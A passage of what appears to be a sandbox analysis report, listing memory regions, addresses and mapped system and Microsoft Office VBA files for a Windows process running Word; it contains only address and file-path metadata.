"c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 406 start_va = 0x75df0000 end_va = 0x75e7efff entry_point = 0x75df3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 407 start_va = 0x75e80000 end_va = 0x75f6ffff entry_point = 0x75e90569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 408 start_va = 0x75f70000 end_va = 0x75f9cfff entry_point = 0x75f7296d region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll") Region: id = 409 start_va = 0x75fa0000 end_va = 0x7619afff entry_point = 0x75fa22d9 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 410 start_va = 0x761a0000 end_va = 0x761f6fff entry_point = 0x761b9ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 411 start_va = 0x76200000 end_va = 0x7635bfff entry_point = 0x7624ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 412 start_va = 0x76360000 end_va = 0x76fa9fff entry_point = 0x763e1601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 413 start_va = 0x76fb0000 end_va = 0x7707bfff entry_point = 0x76fb168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 414 start_va = 0x77140000 end_va = 0x771ebfff entry_point = 0x7714a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 415 start_va = 0x771f0000 end_va = 0x7730cfff entry_point = 0x771f158a region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 416 start_va = 0x77310000 end_va = 0x773acfff entry_point = 0x77343fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 417 start_va = 0x773b0000 end_va = 0x7744ffff entry_point = 0x773c49e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 418 start_va = 0x77450000 end_va = 0x7756efff entry_point = 0x0 region_type = private name = "private_0x0000000077450000" filename = "" Region: id = 419 start_va = 0x77570000 end_va = 0x77669fff entry_point = 0x0 region_type = private name = "private_0x0000000077570000" filename = "" Region: id = 420 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 421 start_va = 0x77820000 end_va = 0x77829fff entry_point = 0x778236a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 422 start_va = 0x77850000 end_va = 0x779cffff entry_point = 0x77850000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 423 start_va = 0x7ef5a000 end_va = 0x7ef5cfff entry_point = 0x0 region_type = private name = "private_0x000000007ef5a000" filename = "" Region: id = 424 start_va = 0x7ef5d000 end_va = 0x7ef5ffff entry_point = 0x0 region_type = private name = "private_0x000000007ef5d000" filename = "" Region: id = 425 start_va = 0x7ef60000 end_va = 0x7ef6ffff entry_point = 0x0 region_type = private name = "private_0x000000007ef60000" filename = "" Region: id = 426 start_va = 0x7ef70000 end_va = 0x7ef7ffff entry_point = 0x0 region_type = private name = "private_0x000000007ef70000" filename = "" Region: id = 427 start_va = 0x7ef80000 end_va = 0x7ef82fff entry_point = 0x0 region_type = private name = "private_0x000000007ef80000" filename = "" Region: id = 428 start_va = 0x7ef83000 end_va = 0x7ef85fff entry_point = 0x0 region_type = private name = "private_0x000000007ef83000" filename = "" Region: id = 429 start_va = 0x7ef86000 end_va = 0x7ef88fff entry_point = 0x0 region_type = private name = "private_0x000000007ef86000" filename = "" Region: id = 430 start_va = 0x7ef89000 end_va = 0x7ef8bfff entry_point = 0x0 region_type = private name = "private_0x000000007ef89000" filename = "" Region: id = 431 start_va = 0x7ef8c000 end_va = 0x7ef8efff entry_point = 0x0 region_type = private name = "private_0x000000007ef8c000" filename = "" Region: id = 432 start_va = 0x7ef8f000 end_va = 0x7ef91fff entry_point = 0x0 region_type = private name = "private_0x000000007ef8f000" filename = "" Region: id = 433 start_va = 0x7ef92000 end_va = 0x7ef94fff entry_point = 0x0 region_type = private name = "private_0x000000007ef92000" filename = "" Region: id = 434 start_va = 0x7ef95000 end_va = 0x7ef97fff entry_point = 0x0 region_type = private name = "private_0x000000007ef95000" filename = "" Region: id = 435 start_va = 0x7ef98000 end_va = 0x7ef9afff entry_point = 0x0 region_type = private name = "private_0x000000007ef98000" filename = "" Region: id = 436 start_va = 0x7ef9b000 end_va = 0x7ef9dfff entry_point = 0x0 region_type = private name = "private_0x000000007ef9b000" filename = "" Region: id = 437 start_va = 0x7ef9e000 end_va = 0x7efa0fff entry_point = 0x0 region_type = private name = "private_0x000000007ef9e000" filename = "" Region: id = 438 start_va = 0x7efa1000 end_va = 0x7efa3fff entry_point = 0x0 region_type = private name = "private_0x000000007efa1000" filename = "" Region: id = 439 start_va = 0x7efa4000 end_va = 0x7efa6fff entry_point = 0x0 region_type = private name = "private_0x000000007efa4000" filename = "" Region: id = 440 start_va = 0x7efa7000 end_va = 0x7efa9fff entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 441 start_va = 0x7efaa000 end_va = 0x7efacfff entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 442 start_va = 0x7efad000 end_va = 0x7efaffff entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 443 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 444 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 445 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 446 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 447 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 448 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 449 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 450 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 451 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 452 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 453 start_va = 0x3a70000 end_va = 0x3a70fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a70000" filename = "" Region: id = 454 start_va = 0x3cf0000 end_va = 0x3d0dfff entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 455 start_va = 0x3e00000 end_va = 0x3e1efff entry_point = 0x0 region_type = private name = "private_0x0000000003e00000" filename = "" Region: id = 456 start_va = 0x3e70000 end_va = 0x3e8efff entry_point = 0x0 region_type = private name = "private_0x0000000003e70000" filename = "" Region: id = 457 start_va = 0x3e90000 end_va = 0x3eaefff entry_point = 0x0 region_type = private name = "private_0x0000000003e90000" filename = "" Region: id = 458 start_va = 0x4830000 end_va = 0x484dfff entry_point = 0x0 region_type = private name = "private_0x0000000004830000" filename = "" Region: id = 459 start_va = 0x6530000 end_va = 0x65b5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006530000" filename = "" Region: id = 460 start_va = 0x66f0000 end_va = 0x676ffff entry_point = 0x66f0000 region_type = mapped_file name = "~dfee6675459ff892ec.tmp" filename = "\\Users\\HJRD1K~1\\AppData\\Local\\Temp\\~DFEE6675459FF892EC.TMP" (normalized: "c:\\users\\hjrd1k~1\\appdata\\local\\temp\\~dfee6675459ff892ec.tmp") Region: id = 461 start_va = 0x74e20000 end_va = 0x7509efff entry_point = 0x74ebbfb8 region_type = mapped_file name = "vbe7.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\vba\\vba7.1\\vbe7.dll") Region: id = 462 start_va = 0x75130000 end_va = 0x751eefff entry_point = 0x75141dfc region_type = mapped_file name = "msvcr100.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\SystemX86\\msvcr100.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\systemx86\\msvcr100.dll") Region: id = 463 start_va = 0x3a80000 end_va = 0x3a90fff entry_point = 0x3a80000 region_type = mapped_file name = "c_1251.nls" filename = "\\Windows\\System32\\C_1251.NLS" (normalized: "c:\\windows\\system32\\c_1251.nls") Region: id = 464 start_va = 0x3ae0000 end_va = 0x3ae1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ae0000" filename = "" Region: id = 465 start_va = 0x3b30000 end_va = 0x3b31fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003b30000" filename = "" Region: id = 466 start_va = 0x6d00000 end_va = 0x6d0ffff entry_point = 0x0 region_type = private name = "private_0x0000000006d00000" filename = "" Region: id = 467 start_va = 0x9d80000 end_va = 0x9e4bfff entry_point = 0x9d80000 region_type = mapped_file name = "times.ttf" filename = "\\Windows\\Fonts\\times.ttf" (normalized: "c:\\windows\\fonts\\times.ttf") Region: id = 468 start_va = 0x74d90000 end_va = 0x74e1bfff entry_point = 0x74d95382 region_type = mapped_file name = "uiautomationcore.dll" filename = "\\Windows\\SysWOW64\\UIAutomationCore.dll" (normalized: "c:\\windows\\syswow64\\uiautomationcore.dll") Region: id = 469 start_va = 0x750f0000 end_va = 0x7512bfff entry_point = 0x750f3089 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\SysWOW64\\oleacc.dll" (normalized: "c:\\windows\\syswow64\\oleacc.dll") Region: id = 470 start_va = 0x3ca0000 end_va = 0x3ca0fff entry_point = 0x3ca0000 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\SysWOW64\\oleaccrc.dll" (normalized: "c:\\windows\\syswow64\\oleaccrc.dll") Region: id = 471 start_va = 0xa400000 end_va = 0xa8b1fff entry_point = 0x0 region_type = private name = "private_0x000000000a400000" filename = "" Region: id = 472 start_va = 0x74d80000 end_va = 0x74d88fff entry_point = 0x74d8153e region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\SysWOW64\\linkinfo.dll" (normalized: "c:\\windows\\syswow64\\linkinfo.dll") Region: id = 473 start_va = 0x75410000 end_va = 0x75412fff entry_point = 0x75410000 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\SysWOW64\\normaliz.dll" (normalized: "c:\\windows\\syswow64\\normaliz.dll") Region: id = 474 start_va = 0x3d10000 end_va = 0x3d10fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003d10000" filename = "" Region: id = 475 start_va = 0x74d20000 end_va = 0x74d7efff entry_point = 0x74d22134 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\SysWOW64\\sxs.dll" (normalized: "c:\\windows\\syswow64\\sxs.dll") Region: id = 476 start_va = 0x3cb0000 end_va = 0x3cb2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003cb0000" filename = "" Region: id = 477 start_va = 0x4730000 end_va = 0x4810fff entry_point = 0x4730000 region_type = mapped_file name = "msword.olb" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\MSWORD.OLB" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\msword.olb") Region: id = 478 start_va = 0x66f00000 end_va = 0x67130fff entry_point = 0x66f0e058 region_type = mapped_file name = "vbeui.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\vba\\vba7.1\\vbeui.dll") Region: id = 479 start_va = 0x3cc0000 end_va = 0x3ccffff entry_point = 0x0 region_type = private name = "private_0x0000000003cc0000" filename = "" Region: id = 480 start_va = 0x3cd0000 end_va = 0x3cd9fff entry_point = 0x3cd0000 region_type = mapped_file name = "normnfd.nls" filename = "\\Windows\\System32\\normnfd.nls" (normalized: "c:\\windows\\system32\\normnfd.nls") Region: id = 481 start_va = 0x63b0000 end_va = 0x642ffff entry_point = 0x63b0000 region_type = mapped_file name = "~wrf{d045fc0c-019d-4d01-881f-6850f85f905e}.tmp" filename = "\\Users\\hJrD1KOKY DS8lUjv\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Word\\~WRF{D045FC0C-019D-4D01-881F-6850F85F905E}.tmp" (normalized: "c:\\users\\hjrd1koky ds8lujv\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.word\\~wrf{d045fc0c-019d-4d01-881f-6850f85f905e}.tmp") Region: id = 482 start_va = 0xa8c0000 end_va = 0xacbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000a8c0000" filename = "" Region: id = 483 start_va = 0x74cf0000 end_va = 0x74d15fff entry_point = 0x74cf0000 region_type = mapped_file name = "vbe7intl.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\vba\\vba7.1\\1033\\vbe7intl.dll") Region: id = 484 start_va = 0x3ce0000 end_va = 0x3ce0fff entry_point = 0x0 region_type = private name = "private_0x0000000003ce0000" filename = "" Region: id = 485 start_va = 0x41f0000 end_va = 0x420ffff entry_point = 0x0 region_type = private name = "private_0x00000000041f0000" filename = "" Region: id = 486 start_va = 0x3e20000 end_va = 0x3e22fff entry_point = 0x0 region_type = private name = "private_0x0000000003e20000" filename = "" Region: id = 487 start_va = 0x3fb0000 end_va = 0x3fb3fff entry_point = 0x0 region_type = private name = "private_0x0000000003fb0000" filename = "" Region: id = 488 start_va = 0x4030000 end_va = 0x4030fff entry_point = 0x0 region_type = private name = "private_0x0000000004030000" filename = "" Region: id = 489 start_va = 0x40e0000 end_va = 0x40e0fff entry_point = 0x0 region_type = private name = "private_0x00000000040e0000" filename = "" Region: id = 490 start_va = 0x4820000 end_va = 0x4823fff entry_point = 0x0 region_type = private name = "private_0x0000000004820000" filename = "" Region: id = 491 start_va = 0x5350000 end_va = 0x536ffff entry_point = 0x0 region_type = private name = "private_0x0000000005350000" filename = "" Region: id = 492 start_va = 0x4850000 end_va = 0x4852fff entry_point = 0x0 region_type = private name = "private_0x0000000004850000" filename = "" Region: id = 493 start_va = 0x5480000 end_va = 0x5494fff entry_point = 0x551bfb8 region_type = mapped_file name = "vbe7.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\vba\\vba7.1\\vbe7.dll") Region: id = 494 start_va = 0x51a0000 end_va = 0x51a3fff entry_point = 0x51a0000 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\SysWOW64\\stdole2.tlb" (normalized: "c:\\windows\\syswow64\\stdole2.tlb") Region: id = 495 start_va = 0x6c70000 end_va = 0x6cebfff entry_point = 0x6c71000 region_type = mapped_file name = "mso.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\MSO.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\mso.dll") Region: id = 496 start_va = 0x51f0000 end_va = 0x51f3fff entry_point = 0x0 region_type = private name = "private_0x00000000051f0000" filename = "" Region: id = 497 start_va = 0x5370000 end_va = 0x5372fff entry_point = 0x0 region_type = private name = "private_0x0000000005370000" filename = "" Region: id = 498 start_va = 0x5570000 end_va = 0x5572fff entry_point = 0x0 region_type = private name = "private_0x0000000005570000" filename = "" Region: id = 499 start_va = 0x56a0000 end_va = 0x56a3fff entry_point = 0x0 region_type = private name = "private_0x00000000056a0000" filename = "" Region: id = 500 start_va = 0x56b0000 end_va = 0x56b2fff entry_point = 0x0 region_type = private name = "private_0x00000000056b0000" filename = "" Region: id = 501 start_va = 0x56c0000 end_va = 0x56c2fff entry_point = 0x0 region_type = private name = "private_0x00000000056c0000" filename = "" Region: id = 502 start_va = 0x56e0000 end_va = 0x56e2fff entry_point = 0x0 region_type = private name = "private_0x00000000056e0000" filename = "" Region: id = 503 start_va = 0x56f0000 end_va = 0x56f2fff entry_point = 0x0 region_type = private name = "private_0x00000000056f0000" filename = "" Region: id = 504 start_va = 0x5700000 end_va = 0x5702fff entry_point = 0x0 region_type = private name = "private_0x0000000005700000" filename = "" Region: id = 505 start_va = 0x5710000 end_va = 0x5713fff entry_point = 0x0 region_type = private name = "private_0x0000000005710000" filename = "" Region: id = 506 start_va = 0x5720000 end_va = 0x5722fff entry_point = 0x0 region_type = private name = "private_0x0000000005720000" filename = "" Region: id = 507 start_va = 0x5f70000 end_va = 0x5f8ffff entry_point = 0x0 region_type = private name = "private_0x0000000005f70000" filename = "" Region: id = 508 start_va = 0x62d0000 end_va = 0x62d5fff entry_point = 0x636bfb8 region_type = mapped_file name = "vbe7.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\vba\\vba7.1\\vbe7.dll") Region: id = 509 start_va = 0x62e0000 end_va = 0x62e3fff entry_point = 0x0 region_type = private name = "private_0x00000000062e0000" filename = "" Region: id = 510 start_va = 0x62f0000 end_va = 0x62f3fff entry_point = 0x0 region_type = private name = "private_0x00000000062f0000" filename = "" Region: id = 511 start_va = 0x6e50000 end_va = 0x6e8ffff entry_point = 0x0 region_type = private name = "private_0x0000000006e50000" filename = "" Region: id = 512 start_va = 0x9fc0000 end_va = 0xa0bffff entry_point = 0x0 region_type = private name = "private_0x0000000009fc0000" filename = "" Region: id = 513 start_va = 0xade0000 end_va = 0xaedffff entry_point = 0x0 region_type = private name = "private_0x000000000ade0000" filename = "" Region: id = 514 start_va = 0x7ef8c000 end_va = 0x7ef8efff entry_point = 0x0 region_type = private name = "private_0x000000007ef8c000" filename = "" Region: id = 515 start_va = 0x6340000 end_va = 0x6343fff entry_point = 0x0 region_type = private name = "private_0x0000000006340000" filename = "" Region: id = 516 start_va = 0x6390000 end_va = 0x6392fff entry_point = 0x0 region_type = private name = "private_0x0000000006390000" filename = "" Region: id = 517 start_va = 0x65c0000 end_va = 0x65c3fff entry_point = 0x0 region_type = private name = "private_0x00000000065c0000" filename = "" Region: id = 518 start_va = 0x65d0000 end_va = 0x65d3fff entry_point = 0x0 region_type = private name = "private_0x00000000065d0000" filename = "" Region: id = 519 start_va = 0x65e0000 end_va = 0x65e3fff entry_point = 0x0 region_type = private name = "private_0x00000000065e0000" filename = "" Region: id = 520 start_va = 0x6cf0000 end_va = 0x6cf3fff entry_point = 0x0 region_type = private name = "private_0x0000000006cf0000" filename = "" Region: id = 521 start_va = 0x6d10000 end_va = 0x6d13fff entry_point = 0x0 region_type = private name = "private_0x0000000006d10000" filename = "" Region: id = 522 start_va = 0x6d20000 end_va = 0x6d22fff entry_point = 0x0 region_type = private name = "private_0x0000000006d20000" filename = "" Region: id = 523 start_va = 0x6d70000 end_va = 0x6d73fff entry_point = 0x0 region_type = private name = "private_0x0000000006d70000" filename = "" Region: id = 524 start_va = 0x6d80000 end_va = 0x6d83fff entry_point = 0x0 region_type = private name = "private_0x0000000006d80000" filename = "" Region: id = 525 start_va = 0x6d90000 end_va = 0x6d93fff entry_point = 0x0 region_type = private name = "private_0x0000000006d90000" filename = "" Region: id = 526 start_va = 0x6da0000 end_va = 0x6da3fff entry_point = 0x0 region_type = private name = "private_0x0000000006da0000" filename = "" Region: id = 527 start_va = 0x6db0000 end_va = 0x6db3fff entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 528 start_va = 0x6dc0000 end_va = 0x6dc3fff entry_point = 0x0 region_type = private name = "private_0x0000000006dc0000" filename = "" Region: id = 529 start_va = 0x6dd0000 end_va = 0x6dd3fff entry_point = 0x0 region_type = private name = "private_0x0000000006dd0000" filename = "" Region: id = 530 start_va = 0x6de0000 end_va = 0x6de3fff entry_point = 0x0 region_type = private name = "private_0x0000000006de0000" filename = "" Region: id = 531 start_va = 0x6df0000 end_va = 0x6df3fff entry_point = 0x0 region_type = private name = "private_0x0000000006df0000" filename = "" Region: id = 532 start_va = 0x6e00000 end_va = 0x6e02fff entry_point = 0x0 region_type = private name = "private_0x0000000006e00000" filename = "" Region: id = 533 start_va = 0x6f90000 end_va = 0x6f93fff entry_point = 0x0 region_type = private name = "private_0x0000000006f90000" filename = "" Region: id = 534 start_va = 0x6fa0000 end_va = 0x6fa3fff entry_point = 0x0 region_type = private name = "private_0x0000000006fa0000" filename = "" Region: id = 535 start_va = 0x6fb0000 end_va = 0x6fb3fff entry_point = 0x0 region_type = private name = "private_0x0000000006fb0000" filename = "" Region: id = 536 start_va = 0x6fc0000 end_va = 0x6fc2fff entry_point = 0x0 region_type = private name = "private_0x0000000006fc0000" filename = "" Region: id = 537 start_va = 0x9800000 end_va = 0x9803fff entry_point = 0x0 region_type = private name = "private_0x0000000009800000" filename = "" Region: id = 538 start_va = 0x9810000 end_va = 0x9813fff entry_point = 0x0 region_type = private name = "private_0x0000000009810000" filename = "" Region: id = 539 start_va = 0x9820000 end_va = 0x9823fff entry_point = 0x0 region_type = private name = "private_0x0000000009820000" filename = "" Region: id = 540 start_va = 0x9930000 end_va = 0x9933fff entry_point = 0x0 region_type = private name = "private_0x0000000009930000" filename = "" Region: id = 541 start_va = 0x9b40000 end_va = 0x9b43fff entry_point = 0x0 region_type = private name = "private_0x0000000009b40000" filename = "" Region: id = 542 start_va = 0x9b50000 end_va = 0x9b53fff entry_point = 0x0 region_type = private name = "private_0x0000000009b50000" filename = "" Region: id = 543 start_va = 0x9b60000 end_va = 0x9b63fff entry_point = 0x0 region_type = private name = "private_0x0000000009b60000" filename = "" Region: id = 544 start_va = 0x9b70000 end_va = 0x9b73fff entry_point = 0x0 region_type = private name = "private_0x0000000009b70000" filename = "" Region: id = 545 start_va = 0x9e50000 end_va = 0x9e53fff entry_point = 0x0 region_type = private name = "private_0x0000000009e50000" filename = "" Region: id = 546 start_va = 0x9e60000 end_va = 0x9e63fff entry_point = 0x0 region_type = private name = "private_0x0000000009e60000" filename = "" Region: id = 547 start_va = 0x9e70000 end_va = 0x9e73fff entry_point = 0x0 region_type = private name = "private_0x0000000009e70000" filename = "" Region: id = 548 start_va = 0x9e80000 end_va = 0x9e83fff entry_point = 0x0 region_type = private name = "private_0x0000000009e80000" filename = "" Region: id = 549 start_va = 0x9e90000 end_va = 0x9e92fff entry_point = 0x0 region_type = private name = "private_0x0000000009e90000" filename = "" Region: id = 550 start_va = 0x9ea0000 end_va = 0x9ea2fff entry_point = 0x0 region_type = private name = "private_0x0000000009ea0000" filename = "" Region: id = 551 start_va = 0x9eb0000 end_va = 0x9eb3fff entry_point = 0x0 region_type = private name = "private_0x0000000009eb0000" filename = "" Region: id = 552 start_va = 0xa0c0000 end_va = 0xa0c3fff entry_point = 0x0 region_type = private name = "private_0x000000000a0c0000" filename = "" Region: id = 553 start_va = 0xa0d0000 end_va = 0xa0d3fff entry_point = 0x0 region_type = private name = "private_0x000000000a0d0000" filename = "" Region: id = 554 start_va = 0xa0e0000 end_va = 0xa0e3fff entry_point = 0x0 region_type = private name = "private_0x000000000a0e0000" filename = "" Region: id = 555 start_va = 0xa0f0000 end_va = 0xa0f3fff entry_point = 0x0 region_type = private name = "private_0x000000000a0f0000" filename = "" Region: id = 556 start_va = 0xa100000 end_va = 0xa103fff entry_point = 0x0 region_type = private name = "private_0x000000000a100000" filename = "" Region: id = 557 start_va = 0xa110000 end_va = 0xa113fff entry_point = 0x0 region_type = private name = "private_0x000000000a110000" filename = "" Region: id = 558 start_va = 0xa120000 end_va = 0xa123fff entry_point = 0x0 region_type = private name = "private_0x000000000a120000" filename = "" Region: id = 559 start_va = 0xa130000 end_va = 0xa133fff entry_point = 0x0 region_type = private name = "private_0x000000000a130000" filename = "" Region: id = 560 start_va = 0xacc0000 end_va = 0xacc3fff entry_point = 0x0 region_type = private name = "private_0x000000000acc0000" filename = "" Region: id = 561 start_va = 0xacd0000 end_va = 0xacd3fff entry_point = 0x0 region_type = private name = "private_0x000000000acd0000" filename = "" Region: id = 562 start_va = 0xace0000 end_va = 0xace3fff entry_point = 0x0 region_type = private name = "private_0x000000000ace0000" filename = "" Region: id = 563 start_va = 0xacf0000 end_va = 0xacf2fff entry_point = 0x0 region_type = private name = "private_0x000000000acf0000" filename = "" Region: id = 564 start_va = 0xad00000 end_va = 0xad03fff entry_point = 0x0 region_type = private name = "private_0x000000000ad00000" filename = "" Region: id = 565 start_va = 0xad10000 end_va = 0xad13fff entry_point = 0x0 region_type = private name = "private_0x000000000ad10000" filename = "" Region: id = 566 start_va = 0xad20000 end_va = 0xad22fff entry_point = 0x0 region_type = private name = "private_0x000000000ad20000" filename = "" Region: id = 567 start_va = 0xad30000 end_va = 0xad33fff entry_point = 0x0 region_type = private name = "private_0x000000000ad30000" filename = "" Region: id = 568 start_va = 0xad40000 end_va = 0xad43fff entry_point = 0x0 region_type = private name = "private_0x000000000ad40000" filename = "" Region: id = 569 start_va = 0xad50000 end_va = 0xad53fff entry_point = 0x0 region_type = private name = "private_0x000000000ad50000" filename = "" Region: id = 570 start_va = 0xad60000 end_va = 0xad63fff entry_point = 0x0 region_type = private name = "private_0x000000000ad60000" filename = "" Region: id = 571 start_va = 0xad70000 end_va = 0xad73fff entry_point = 0x0 region_type = private name = "private_0x000000000ad70000" filename = "" Region: id = 572 start_va = 0xad80000 end_va = 0xad83fff entry_point = 0x0 region_type = private name = "private_0x000000000ad80000" filename = "" Region: id = 573 start_va = 0xad90000 end_va = 0xad93fff entry_point = 0x0 region_type = private name = "private_0x000000000ad90000" filename = "" Region: id = 574 start_va = 0xada0000 end_va = 0xada3fff entry_point = 0x0 region_type = private name = "private_0x000000000ada0000" filename = "" Region: id = 575 start_va = 0xadb0000 end_va = 0xadb3fff entry_point = 0x0 region_type = private name = "private_0x000000000adb0000" filename = "" Region: id = 576 start_va = 0xadc0000 end_va = 0xadc2fff entry_point = 0x0 region_type = private name = "private_0x000000000adc0000" filename = "" Region: id = 577 start_va = 0xadd0000 end_va = 0xadd3fff entry_point = 0x0 region_type = private name = "private_0x000000000add0000" filename = "" Region: id = 578 start_va = 0xaee0000 end_va = 0xaee3fff entry_point = 0x0 region_type = private name = "private_0x000000000aee0000" filename = "" Region: id = 579 start_va = 0xaef0000 end_va = 0xaef3fff entry_point = 0x0 region_type = private name = "private_0x000000000aef0000" filename = "" Region: id = 580 start_va = 0xaf00000 end_va = 0xaf03fff entry_point = 0x0 region_type = private name = "private_0x000000000af00000" filename = "" Region: id = 581 start_va = 0xaf10000 end_va = 0xaf12fff entry_point = 0x0 region_type = private name = "private_0x000000000af10000" filename = "" Region: id = 582 start_va = 0xaf20000 end_va = 0xaf23fff entry_point = 0x0 region_type = private name = "private_0x000000000af20000" filename = "" Region: id = 583 start_va = 0xaf30000 end_va = 0xaf33fff entry_point = 0x0 region_type = private name = "private_0x000000000af30000" filename = "" Region: id = 584 start_va = 0xaf40000 end_va = 0xaf43fff entry_point = 0x0 region_type = private name = "private_0x000000000af40000" filename = "" Region: id = 585 start_va = 0xaf50000 end_va = 0xaf53fff entry_point = 0x0 region_type = private name = "private_0x000000000af50000" filename = "" Region: id = 586 start_va = 0xaf60000 end_va = 0xaf63fff entry_point = 0x0 region_type = private name = "private_0x000000000af60000" filename = "" Region: id = 587 start_va = 0xaf70000 end_va = 